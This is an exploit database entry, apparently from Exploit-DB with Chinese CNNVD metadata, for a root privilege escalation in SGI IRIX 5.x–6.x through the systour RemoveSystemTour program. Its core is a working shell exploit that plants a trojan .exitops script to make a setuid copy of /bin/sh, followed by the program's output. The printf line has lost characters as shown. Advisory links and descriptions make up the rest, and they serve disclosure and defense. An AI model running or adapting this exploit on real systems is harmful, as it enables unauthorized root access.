https://www.exploit-db.com/exploits/19356
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199610-009

IRIX5.x至6.3版本的SGI系统tour数据包(systour)中的IndigoMagicSystemTour存在漏洞。本地用户可以借助一个Trojanhorse.exitops程序获取根权限，该程序由RemoveSystemTour程序执行的inst命令请求运行。

source: http://www.securityfocus.com/bid/470/info

A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. 

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#!/bin/shnchmod 4777 /tmp/foobarn' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.

来源:USGovernmentResource:AA-96.08
名称:AA-96.08
链接:ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.08.SGI.systour.vul
来源:BID
名称:470
链接:http://www.securityfocus.com/bid/470
来源:BUGTRAQ
名称:19961030(Another)vulnerabilityinnewSGIs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=87602167420095&w;=2
来源:SGI
名称:19961101-01-I
链接:ftp://patches.sgi.com/support/free/security/advisories/19961101-01-I
来源:XF
名称:irix-systour(7456)
链接:http://www.iss.net/security_center/static/7456.php